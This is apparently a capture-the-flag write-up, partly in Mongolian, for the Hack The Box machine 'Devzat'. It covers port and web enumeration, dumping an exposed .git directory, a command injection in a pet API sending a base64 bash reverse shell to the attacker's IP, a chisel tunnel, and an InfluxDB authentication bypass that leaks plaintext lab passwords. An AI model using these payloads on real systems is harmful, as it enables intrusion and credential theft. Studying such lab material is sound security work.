1. IP Address
# Machine хаяг
10.10.11.118
# Local хаяг
10.10.14.140
2. Nmap
nmap -sV -sC -oA nmap/devzat 10.10.11.118
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-17 03:09 EST
Nmap scan report for 10.10.11.118
Host is up (0.24s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c2:5f:fb:de:32:ff:44:bf:08:f5:ca:49:d4:42:1a:06 (RSA)
| 256 bc:cd:e8:ee:0a:a9:15:76:52:bc:19:a4:a3:b2:ba:ff (ECDSA)
|_ 256 62:ef:72:52:4f:19:53:8b:f2:9b:be:46:88:4b:c3:d0 (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://devzat.htb/
8000/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-Go
| ssh-hostkey:
|_ 3072 6a:ee:db:90:a6:10:30:9f:94:ff:bf:61:95:2a:20:63 (RSA)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.91%I=7%D=2/17%Time=620E02E2%P=x86_64-pc-linux-gnu%r(NU
SF:LL,C,"SSH-2\.0-Go\r\n");
Service Info: Host: devzat.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.28 seconds
22 tcp ssh
80 http
8000 tcp ssh
3. Nikto
nikto -h 10.10.11.118
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.11.118
+ Target Hostname: 10.10.11.118
+ Target Port: 80
+ Start Time: 2022-02-17 03:11:03 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://devzat.htb/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
нэмэх /etc/hosts -> devzat.htb
4. Gobuster
gobuster dir -u http://devzat.htb -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://devzat.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/02/17 03:20:16 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 309] [--> http://devzat.htb/images/]
/assets (Status: 301) [Size: 309] [--> http://devzat.htb/assets/]
/javascript (Status: 301) [Size: 313] [--> http://devzat.htb/javascript/]
Progress: 31191 / 220561 (14.14%) ^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/02/17 03:32:56 Finished
===============================================================
5. Ffuf
ffuf -c -u http://devzat.htb/ -H "Host: FUZZ.devzat.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -mc 200
-mc: Match HTTP status codes, or “all” for everything. (default: 200,204,301,302,307,401,403,405,500)
________________________________________________
:: Method : GET
:: URL : http://devzat.htb/
:: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.devzat.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200
________________________________________________
pets [Status: 200, Size: 510, Words: 20, Lines: 21]
:: Progress: [4989/4989] :: Job [1/1] :: 165 req/sec :: Duration: [0:00:33] :: Errors: 0 ::
нэмэх pets.devzat.htb -> /etc/hosts
fuf -u http://pets.devzat.htb/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -fs 510
-fs: Filter HTTP response size. Comma separated list of sizes and ranges
v1.3.1
________________________________________________
:: Method : GET
:: URL : http://pets.devzat.htb/FUZZ
:: Wordlist : FUZZ: /opt/SecLists/Discovery/Web-Content/raft-small-words.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 510
________________________________________________
css [Status: 301, Size: 40, Words: 3, Lines: 3]
build [Status: 301, Size: 42, Words: 3, Lines: 3]
server-status [Status: 403, Size: 280, Words: 20, Lines: 10]
.git [Status: 301, Size: 41, Words: 3, Lines: 3]
:: Progress: [43003/43003] :: Job [1/1] :: 165 req/sec :: Duration: [0:04:24] :: Errors: 0 ::
.git
6. .Git dumber and Extract
##Download Gittools:
# https://github.com/internetwache/GitTools/releases/tag/v0.0.1
tar zxvf gitTools-v0.0.1.tgz
Dumper:
gitdumper.sh http://pets.devzat.htb/.git/ pets
Extractor:
./extractor.sh pets pets_dump
total 0
drwxr-xr-x 1 ca4mi ca4mi 252 Feb 17 04:41 .
drwxr-xr-x 1 ca4mi ca4mi 114 Feb 17 04:42 ..
drwxr-xr-x 1 ca4mi ca4mi 160 Feb 17 04:41 0-ef07a04ebb2fc92cf74a39e0e4b843630666a705
drwxr-xr-x 1 ca4mi ca4mi 160 Feb 17 04:41 1-8274d7a547c0c3854c074579dfc359664082a8f6
drwxr-xr-x 1 ca4mi ca4mi 160 Feb 17 04:41 2-464614f32483e1fde60ee53f5d3b4d468d80ff62
main.go
func loadCharacter(species string) string {
cmd := exec.Command("sh", "-c", "cat characteristics/"+species)
stdoutStderr, err := cmd.CombinedOutput()
if err != nil {
return err.Error()
}
return string(stdoutStderr)
}
7. Reverse Shell
sudo tcpdump -i tun0 icmp
Output:
05:20:18.743591 IP devzat.htb > 10.10.14.140: ICMP echo request, id 4, seq 354, length 64
05:20:18.743613 IP 10.10.14.140 > devzat.htb: ICMP echo reply, id 4, seq 354, length 64
05:20:19.202056 IP devzat.htb > 10.10.14.140: ICMP echo request, id 2, seq 428, length 64
05:20:19.202078 IP 10.10.14.140 > devzat.htb: ICMP echo reply, id 2, seq 428, length 64
05:20:19.245840 IP devzat.htb > 10.10.14.140: ICMP echo request, id 6, seq 112, length 64
05:20:19.245862 IP 10.10.14.140 > devzat.htb: ICMP echo reply, id 6, seq 112, length 64
05:20:19.432060 IP devzat.htb > 10.10.14.140: ICMP echo request, id 1, seq 1547, length 64
05:20:19.432137 IP 10.10.14.140 > devzat.htb: ICMP echo reply, id 1, seq 1547, length 64
base64 руу:
## Base64 руу хөрвүүлөх
echo -n 'bash -i>& /dev/tcp/10.10.14.140/9001 0>&1' | base64
## /хуулах/
YmFzaCAtaT4mIC9kZXYvdGNwLzEwLjEwLjE0LjE0MC85MDAxIDA+JjE=
## 9001 port дээр сонсох
nc -lvnp 9001
Burp дээр req барин base64 -d хийх:
POST /api/pet HTTP/1.1
Host: pets.devzat.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://pets.devzat.htb/
Content-Type: text/plain;charset=UTF-8
Origin: http://pets.devzat.htb
Content-Length: 82
DNT: 1
Connection: close
Sec-GPC: 1
{"name":"fg","species":"cat; echo -n YmFzaCAtaT4mIC9kZXYvdGNwLzEwLjEwLjE0LjE0MC85MDAxIDA+JjE= | base64 -d | bash"}
id:
patrick@devzat:~/pets
id
uid=1000(patrick) gid=1000(patrick) groups=1000(patrick)
7.1 Shell balance:
python3 -c 'import pty;pty.spawn("/bin/bash")'
ctrl+z
stty raw -echo
f+g [enter enter]
буцаад nc орлоо
export TERM=xterm
catherine
8. Exploitation
Local VM:
# http сервер асаах
python3 -m http.server
Machine VM:
8.1 linpeas
curl 10.10.14.140:8000/linpeas.sh -o linpeas.sh
##
chmod +x linpeas.sh
Үр дүнд:
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8086 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8443 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:5000 0.0.0.0:* LISTEN 898/./petshop
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::8000 :::* LISTEN 897/./devchat
8.2 Chisel
### Download
chisel_1.7.7_linux_amd64.gz
## unzip
gzip -d chisel_1.7.7_linux_amd64.gz
mv chisel_1.7.7_linux_amd64 chisel
chmod +x chisel
## curl to Machine VM
curl 10.10.14.140:8000/chisel -o chisel
Local VM:
./chisel server -p 3477 --reverse
2022/02/17 06:27:13 server: Reverse tunnelling enabled
2022/02/17 06:27:13 server: Fingerprint IXk1H0yZ/WxP4FYsKS66U8CMaC7XAZgNC/Lh84a3XkI=
2022/02/17 06:27:13 server: Listening on http://0.0.0.0:3477
2022/02/17 06:27:38 server: session#1: tun: proxy#R:8086=>8086: Listening
Machine VM:
./chisel client 10.10.14.140:3477 R:8086:127.0.0.1:8086
patrick@devzat:/tmp$ ./chisel client 10.10.14.140:3477 R:8086:127.0.0.1:8086
2022/02/17 11:27:37 client: Connecting to ws://10.10.14.140:3477
2022/02/17 11:27:39 client: Connected (Latency 239.707911ms)
8.3 Nmap scan:
nmap -p 8086 -sV 127.0.0.1
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-17 06:29 EST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.0076s latency).
PORT STATE SERVICE VERSION
8086/tcp open http InfluxDB http admin 1.7.5
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.72 seconds
8.4 CVE-2019-20933
Host (default: localhost):
Port (default: 8086):
Username <OR> path to username file (default: users.txt): /opt/SecLists/Usernames/Names/names.txt
[v] admin
Host vulnerable !!!
Databases:
1) devzat
2) _internal
.quit to exit
[admin@127.0.0.1] Database: devzat
Starting InfluxDB shell - .back to go back
[admin@127.0.0.1/devzat] $
SELECT * FROM “user”:
{
"results": [
{
"series": [
{
"columns": [
"time",
"enabled",
"password",
"username"
],
"name": "user",
"values": [
[
"2021-06-22T20:04:16.313965493Z",
false,
"WillyWonka2021",
"wilhelm"
],
[
"2021-06-22T20:04:16.320782034Z",
true,
"woBeeYareedahc7Oogeephies7Aiseci",
"catherine"
],
[
"2021-06-22T20:04:16.996682002Z",
true,
"RoyalQueenBee$",
"charles"
]
]
}
],
"statement_id": 0
}
]
}
su - catherine
woBeeYareedahc7Oogeephies7Aiseci
user.txt:
433d81******
9. Enumeration
linpeas.sh
#)You_can_write_even_more_files_inside_last_directory
/var/backups/devzat-dev.zip
/var/backups/devzat-main.zip
/var/crash
/var/tmp
- /var/backups/devzat-dev.zip
- /var/backups/devzat-main.zip
Unzip:
unzip devzat-dev.zip
unzip devzat-main.zip
# 2 ижил файлаас юу нь ялгаатай байгааг шалгах
diff main/commands.go dev/commands.go
Output:
> // Check my secure password
> if pass != "CeilingCatStillAThingIn2021?" {
> u.system("You did provide the wrong password")
> return
> }
ssh -l test localhost -p 8443
root.txt
fd3fb39c**********